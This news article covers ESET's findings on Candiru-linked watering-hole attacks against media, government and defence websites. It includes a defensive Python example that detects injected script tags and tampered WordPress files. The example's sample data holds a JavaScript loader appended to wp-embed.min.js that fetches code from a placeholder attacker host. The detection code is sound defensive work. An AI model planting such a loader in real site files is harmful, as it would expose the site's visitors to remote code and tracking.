New evidence suggests that Israeli spyware vendor Candiru, which was recently added to the US government’s economic blacklist, carried out “watering hole” attacks on high-profile targets in the UK and the Middle East.
ESET revealed in a report that the hacked websites belonged to media outlets in the United Kingdom, Saudi Arabia, Yemen, and Hezbollah; to Iranian government institutions (Ministry of Foreign Affairs), Syrian government institutions (including the Ministry of Electricity), and Yemeni government institutions (including the Ministries of Interior and Finance); ISPs in Yemen and Syria; and aerospace/military tech companies in South Africa and Italy. The attackers also developed a website that looked like it was from a medical trade fair in Germany.
The strategic web compromises are thought to have occurred in two waves, separated by a period in which the malicious scripts were removed from the targeted domains. The first wave started in March 2020 and ended in August 2020; the second began in January 2021 and ended in early August 2021.
Watering hole attacks are a type of highly targeted intrusion in which websites that a specific group of end users is known to visit are backdoored, so that members of that group are infected when they browse to the site and the attackers gain access to their computers for further exploitation.
According to the Slovak cybersecurity firm, the hijacked websites are merely used as a jumping-off point to reach the ultimate targets. Kaspersky linked the second wave to a threat actor known as Karkadann, noting commonalities in tactics, techniques, and procedures (TTPs).
The initial attack chains involved inserting JavaScript code loaded from a remote attacker-controlled domain into the compromised webpages; the script was designed to capture and exfiltrate the target machine’s IP geolocation and system information. The final stage was a likely browser remote code execution exploit, which allowed the attackers to take control of the victims’ computers.
The second wave, which began in January 2021, was stealthier. Rather than being added directly to the main HTML page, the malicious code was embedded in a genuine WordPress script (“wp-embed.min.js”), and that mechanism was used to load a script from a server under the attackers’ control. Furthermore, the fingerprinting script captured the default language, the list of fonts supported by the browser, the time zone, and the list of browser plugins, in addition to system metadata.
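The two injection techniques described above, a remote script tag added to the page and a loader spliced into a legitimate bundled WordPress file, can both be caught from the site owner’s side. The following is an added example written for this article, not ESET’s or the attackers’ code: it flags script tags whose host is not on a site allowlist and compares bundled JavaScript files against known-good SHA-256 digests. The allowlist, the sample HTML and the file contents are constructed for the example; the hostname attacker-controlled.invalid is a placeholder, not an indicator from the report.

```python
"""Added example (not from the original article): detect injected external
script tags and modified bundled WordPress scripts in a site's own files."""
import hashlib
import re
from urllib.parse import urlparse

# Hypothetical allowlist of origins the site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"cdn.example.org"}

# Matches <script ... src="..."> tags; [^>]* keeps the match inside one tag.
SCRIPT_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)


def unexpected_script_hosts(html: str, allowed: set[str] = ALLOWED_SCRIPT_HOSTS) -> list[str]:
    """Return hosts of externally loaded scripts that are not on the allowlist.

    Relative URLs (no host) are same-origin and therefore expected; protocol-
    relative URLs ("//host/x.js") are resolved with an https scheme so that
    their host is still examined.
    """
    found: list[str] = []
    for src in SCRIPT_RE.findall(html):
        host = urlparse(src, scheme="https").hostname
        if host is None:
            continue
        if host not in allowed and host not in found:
            found.append(host)
    return found


def modified_scripts(files: dict[str, bytes], baseline: dict[str, str]) -> list[str]:
    """Return paths whose current SHA-256 digest no longer matches the baseline.

    A file missing from `files` is reported as modified, since an absent file
    hashes to the digest of the empty string and cannot match a real baseline.
    """
    changed: list[str] = []
    for path, expected in baseline.items():
        actual = hashlib.sha256(files.get(path, b"")).hexdigest()
        if actual != expected:
            changed.append(path)
    return changed


# Constructed sample page: one same-origin script, one allowlisted CDN script,
# and one script injected from an attacker-controlled host (placeholder name).
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery.min.js"></script>
<script src="https://cdn.example.org/analytics.js"></script>
<script src="https://attacker-controlled.invalid/fp.js"></script>
</head><body></body></html>"""

# Constructed stand-ins for the bundled file: the clean copy recorded at install
# time, and a deployed copy with a loader appended to it.
WP_EMBED_PATH = "wp-includes/js/wp-embed.min.js"
CLEAN_WP_EMBED = b"!function(e,t){/* constructed stand-in for wp-embed.min.js */}(window,document);"
TAMPERED_WP_EMBED = CLEAN_WP_EMBED + (
    b'\n;(function(){var s=document.createElement("script");'
    b's.src="https://attacker-controlled.invalid/l.js";document.head.appendChild(s);})();'
)

# Baseline digests are taken from the clean install and stored out of band.
BASELINE = {WP_EMBED_PATH: hashlib.sha256(CLEAN_WP_EMBED).hexdigest()}
DEPLOYED_FILES = {WP_EMBED_PATH: TAMPERED_WP_EMBED}


if __name__ == "__main__":
    print("unexpected script hosts:", unexpected_script_hosts(SAMPLE_HTML))
    print("modified bundled scripts:", modified_scripts(DEPLOYED_FILES, BASELINE))
```

Run against real files, the baseline digests would be generated from a fresh WordPress release of the same version and kept outside the web root, so that an attacker who can write to the site cannot also rewrite the reference hashes. The first check is cheap enough to run on every deploy; the second belongs in a scheduled integrity job.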
The specific exploit and payload sent have yet to be determined. “This demonstrates that the operators have chosen to focus their operations and do not want to burn their zero-day exploits,” stated ESET malware researcher Matthieu Faou.
The campaign’s connections to Candiru stem from the fact that some of the attackers’ command-and-control servers are identical to those previously known to belong to the Israeli firm, and from the fact that the firm has browser-based remote code execution exploits in its arsenal, suggesting that the operators of the watering holes are Candiru clients.
According to ESET, the attackers stopped operating around the end of July 2021, which coincided with public announcements regarding Candiru’s use of various zero-day vulnerabilities in the Chrome browser to target victims in Armenia.